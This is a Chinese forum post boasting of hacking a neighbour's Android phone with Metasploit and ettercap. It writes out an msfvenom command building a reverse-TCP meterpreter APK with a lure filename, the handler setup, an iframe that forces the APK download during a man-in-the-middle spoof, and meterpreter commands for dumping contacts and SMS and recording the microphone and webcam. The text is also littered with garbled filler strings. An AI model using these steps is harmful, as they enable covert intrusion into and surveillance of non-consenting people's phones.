metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

) v- L m% ~ b! J4 r 五、msf+ettercap入侵邻居安卓手机 / k3 k) E }; B' P3 T" Q$ r

2 f& P/ j- d3 w \0 }' K 首先启动msf ; }: n4 i( G$ V6 N( v. ^

" {* l0 {7 Y- n 先用kali生成一个安卓木马，如下命令： . X- i$ q C- a; H3 G) o

+ B4 _. t6 a. k& u0 w- J Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk . W3 X$ }6 C# U& G4 h' u

: H" `6 O. X8 Y& i; C$ z( a: o 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 5 }& P& T0 P* ]6 p/ R' t/ U$ m+ Z

& A& J+ b+ S% r( [; U1 n( p 然后进入msf & K- z/ y0 [9 Q6 H$ S: N

0 ]4 Q$ F1 U7 `- u$ m! R use exploit/multi/handler , A# A: m; X8 d1 ^ R

7 W3 M% \- {2 _ @0 A! w: P set payload android/meterpreter/reverse_tcp - ^4 I- T4 b( j( ]

+ C' g0 G' Z0 z+ q) Q T set LHOST 192.168.0.109 //ip为kaili的ip ; i. u* d$ E* e, r; Y. a

7 V' A# R" U e' q% n3 g set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / w- S! y) c5 y- L0 N

9 |: n5 E1 E v, f1 S# G: B Exploit / V6 m! P" w' R5 z2 i

0 b" R" G' P/ L! |5 m) U + b$ }1 J$ s. R- L* s: ?

; M8 ]- ]+ u% \5 _" F 下面我们开启ettercap -G 8 |4 [+ `+ |2 [4 w' V$ O

, O$ G7 P) M* T 我物理IP为 6 D1 a! B' I' O" A% h( {4 R

3 R6 H$ \! k. W6 G% C3 P' T9 e . l9 t& Z& l& J' w

# m, F7 z4 I* H$ I) c 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， 4 k9 U/ O& S' Q S* {+ [( x7 Y0 p

" p Y- N {8 @ 下面我们来设置一下 h1 u& E2 ^ M6 Y% X1 z4 u

s9 @3 `, T; P5 z1 k* U% Y: Z $ k* i7 e1 k2 z

" V0 l6 K9 y. v 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， ' d" _$ l' z% f: T1 k! a

7 Z& i. l) P3 T6 V( u4 G . k+ G' A- i: p( ]" h V- j8 s

8 u2 S( o) m; R7 p2 W , @: V& B; d9 w |, s; Y! [

; j9 b3 e3 ~' L/ D 9 i/ ~" K, N0 m& o0 k& _5 `6 ^' M

0 n; Q4 {/ y# J 2 h; x8 P a! e5 E: o( `7 X9 F3 @

2 s) `. {7 L. o " K2 C0 x/ D& F4 u& k

! |, W S7 B7 h; }; U. G 4 V, G5 o* g" D4 i$ t

; q) I, v. M8 [! ^+ u! H5 Z/ m3 V . G3 r6 N; j, f$ `9 ]

3 S" D6 H) H+ I5 n# d* M . Z9 d0 }$ u: K4 Q& ^$ a

F3 Q" R8 ]- k, m. r( l6 i( w: s3 s 1 I! C: N% t7 w6 [) d' r& B

! c4 {7 Y* G: K3 Q9 J- ` 3 R/ z- W& x' V: Y

3 d, `0 W/ L5 G1 ?% U ; M+ J/ `4 _$ Y

5 S- E r& d( V1 I4 H% c9 R7 u # u' q6 |! L7 F% B8 U6 f* l# h- p

0 c' `! F. r* {" q3 }6 T7 z8 h2 k 9 D% l( @% I) c! S8 x o/ g

# H$ y+ _- S0 m3 U$ n! l+ U 下面我们开始攻击 ; h+ t4 w0 u: S; ~( E1 r

/ v" b; {$ }8 d1 M& u; {" O & a- }' v- A1 X0 {0 D) }

. D; ~6 T7 M4 \) t% Q ) s( ?1 e& {% q# Y4 v

3 j2 E* _9 |( h* Z% t + P8 {4 |& A( b

8 H* v3 ^% }5 Q 4 h1 |; r' Q5 T4 Z1 p

& \& `: |4 X2 y & y5 p7 |' F7 a7 W

( H5 f9 i: d7 s! [8 i2 `/ s 大概过了5分钟多，发现反弹成功了 . @9 z3 T) o# t1 j2 G# u

1 K1 j: x# n1 i% H4 E 9 i6 E* b. Q) s" [0 Y

+ q* ~" }; `) c# O5 N " K5 A' h' I3 }, M0 l. _4 G. X

0 v5 W' \* ?7 P) M3 Q7 C & N" Q8 g: q; R4 F

2 d7 s$ a0 J* e0 u X; F ! a$ d( J0 }) s2 @( h7 d h

5 `$ p+ y2 C$ [3 N# x+ m ' R5 @6 w6 A2 |) ?9 F4 K/ r" h9 A% x

* O) [& `* J8 P) R" @0 c- u 7 v* H9 U* L# M

" e: x- [2 a: k: E / s' j6 B2 w- }9 j4 t. O7 j! z

+ j6 ^% q: s0 N$ d$ X" Y& x( g 执行命令 ( ?+ n$ b; Z4 @! Y( U) e( X5 a

6 l5 y& `$ A! n2 |+ R: M 2 h5 j: H" C& y% N2 _1 b

& h; w* l" x4 h. R, Y dump_contacts --》这个是导出电话 : E: \* K; i+ L1 o4 c

" O& I8 A% p# e& N( M! q% A. [ dump_sms --》这个是导出信息 1 T: G+ }: N$ W; f6 [- W) P

3 v2 }7 `+ Q9 t' v5 Z record_mic Record audio from the default microphone for X seconds # \) I7 ]# ~6 M7 [ r6 e

3 y: K) v# e/ j/ P$ z% A! p webcam_chat Start a video chat ( ^, S" M: L0 v4 h( h1 ^0 |0 s

" n. F+ ^* j* v P, m webcam_list List webcams & v) A% ^7 I- {/ p3 M- c. t

' F' S8 ]/ s' }/ `1 H. z6 D webcam_snap Take a snapshot from the specified webcam 6 @# w" K/ t0 a- F+ r4 L

' f1 x+ Q+ S3 A& Q, i4 m webcam_stream lay a video stream from the specified webcam N& x9 t3 \8 q4 J

% d- z3 Q* e) x( R4 H! a- ` 6 a2 x+ ? n$ o! b

; s; m& O* e( V& C0 f8 \ 4 d5 \5 @ @0 C' t

4 n' e8 S- ]3 R& T5 y 我们打开看一下电话薄， - w: s: ^+ F$ C8 Y; D

^1 Y7 t) m' T2 f" T7 t* }# q 6 n0 x% K4 S6 w

) x# R: O0 v$ J& u# y4 D) W 1 v1 N$ o# w, b4 R

6 m, M% L. v# I$ f ( |1 s% L$ ~, q' R; B1 w8 e

2 R3 b) e# a" K! U$ @ & c/ g' C6 p( p. Z+ ^( h/ V

5 k" `4 v: n" g; t$ H7 G1 C4 M # Q; q( W9 R) O: r8 p5 _) d

7 p' z* E: { S4 [9 k- t3 A8 L 3 |8 J5 X; j' @ X

& h H; e1 W1 p: `9 ~3 g4 c% X4 f3 v 我们同时欺骗成DroidJack木马，使用方法如图： 5 q& `/ o7 V! r* a3 L/ Y: Z

' Z# w; J# I& E# s7 ` 1 N! Z1 }5 i4 R1 |

- F7 y- q5 \5 Q7 j7 D1 \/ G. T( J , {/ T# i1 y5 j; v/ m J

. k! ^4 O* Y5 W, ~3 r8 l ! {/ P! [: f. w# p- w, `5 p

8 u2 q( H! h" m: a 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 5 R+ t" I- Q6 y" W Q

+ T \0 A l! f F, { . v1 r9 S3 ^: n5 m/ K8 ]

# M0 q6 t. I! R9 w" x6 m' [ " V; f. k! J, O' u" Q% q

/ {5 j9 h4 D" R ` 5 J; _8 s0 { e

! i9 K! d) a8 \: ]9 s $ u, A0 x3 a9 J9 z* K o

5 l. L/ F1 L8 v
' [' o. x/ M2 H6 ]9 {. y" X

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块